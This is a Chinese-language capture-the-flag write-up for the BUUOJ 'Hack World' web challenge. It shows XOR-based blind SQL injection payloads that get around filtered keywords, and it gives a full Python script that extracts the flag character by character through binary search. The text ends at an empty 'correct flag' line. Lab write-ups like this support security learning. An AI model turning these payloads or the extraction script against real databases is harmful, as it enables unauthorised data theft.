[CISCN2019 华北赛区 Day2 Web1]Hack World 1

[CISCN2019 华北赛区 Day2 Web1]Hack World 1

https://buuoj.cn/

---

解题点：

异或盲注

---

1.fuzz
bp抓包，对post参数id进行fuzz测试
and、or、group_concat均被过滤

但是题目很友好，把flag所在表名和字段名都给你，能省很多事

感谢大佬整理：
sql-fuzz字典

2.异或注入
输入1，2均有回显
但输入字母，会回显bool(false)
可以确定是数字型注入

但介于and和or被过滤，所以使用异或注入

0^1能正常回显Hello, glzjin wants a girlfriend.（me too.）
可以对库名长度进行爆破
0^(length(database())>=1)
经过一波测试，11正常，12报错
那么数据库名长度为11
我甚至把库名爆破出来了，但后来发现没必要
库名：ctftraii8ng

3.脚本盲注

import requests
import time

url="http://4af4aa9c-beca-4eac-8b4d-d1fe78022077.node4.buuoj.cn:81"
name=''


for i in range(1,100):
    print(i)
    low=32
    high=129
    mid=(low+high)//2
    while low<high:
        #payload = "0^(ascii(substr((select(database())),%d,1))>%d)" % (i, mid)
        payload = "0^(ascii(substr((select(flag)from(flag)),%d,1))>%d)" % (i, mid)
        
        data = {
            "id" : payload
        }
        r = requests.post(url,data=data)
        if 'Hello, glzjin wants a girlfriend.' in r.text:
            low = mid+1
        else:
            high=mid
        mid=(low+high)//2
        if(mid==32):
            break
    name=name+chr(mid)
    print (name)

low和high的值可能需要调整范围（因为爆破出几个有问题的flag）

正确flag：